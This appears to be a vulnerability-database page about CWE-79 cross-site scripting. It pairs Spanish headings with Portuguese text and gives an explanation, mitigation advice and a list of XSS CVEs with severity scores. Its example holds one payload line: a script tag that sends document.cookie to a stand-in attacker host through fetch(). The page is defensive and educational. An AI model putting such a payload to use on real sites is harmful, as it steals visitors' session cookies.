Fallos del tipo CWE-79

28.619 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-35627MEDIUMtileserver-gl up to v4.4.10 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /data/v3/?key.EPSS 1.0%CVE-2024-21910MEDIUMCross-site scripting vulnerability in TinyMCE pluginsEPSS 1.0%CVE-2016-3709—Possible cross-site scripting vulnerability in libxml after commit 960f0e2.EPSS 1.0%CVE-2022-2066HIGHCross-site Scripting (XSS) - Reflected in neorazorx/facturascriptsEPSS 1.0%CVE-2022-44949MEDIUMRukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?mEPSS 1.0%CVE-2021-4289LOWOpenMRS openmrs-module-referenceapplication User App Page UserAppPageController.java post cross site scriptingEPSS 1.0%CVE-2022-44950MEDIUMRukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?mEPSS 1.0%CVE-2023-45757—Apache bRPC: The builtin service rpcz page has an XSS attack vulnerabilityEPSS 1.0%CVE-2022-3484MEDIUMWPB Show Core - Reflected Cross-Site ScriptingEPSS 1.0%CVE-2021-25963MEDIUMShuup - Reflected XSS in Error PageEPSS 1.0%CVE-2022-44951MEDIUMRukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.phEPSS 1.0%CVE-2023-36886HIGHMicrosoft Dynamics 365 (on-premises) Cross-site Scripting VulnerabilityEPSS 1.0%CVE-2021-39345MEDIUMHAL <= 2.1.1 Authenticated Stored Cross-Site ScriptingEPSS 1.0%CVE-2024-30053MEDIUMAzure Migrate Cross-Site Scripting VulnerabilityEPSS 1.0%CVE-2023-2256—Product Addons & Fields for WooCommerce < 32.0.7 - Reflected Cross-Site ScriptingEPSS 1.0%CVE-2023-34121MEDIUMImproper input validation in the Zoom for Windows, Zoom Rooms, Zoom VDI Windows Meeting clients before 5.14.0 may allow an authenticated EPSS 1.0%CVE-2022-2470MEDIUMCross-site Scripting (XSS) - Reflected in microweber/microweberEPSS 1.0%CVE-2020-19947CRITICALCross Site Scripting vulnerability found in Markdown Edit allows a remote attacker to execute arbitrary code via the edit parameter of the wEPSS 1.0%CVE-2020-10643MEDIUMOSIsoft PI SystemEPSS 1.0%CVE-2022-1250—LifterLMS PayPal < 1.4.0 - Reflected Cross-Site ScriptingEPSS 0.9%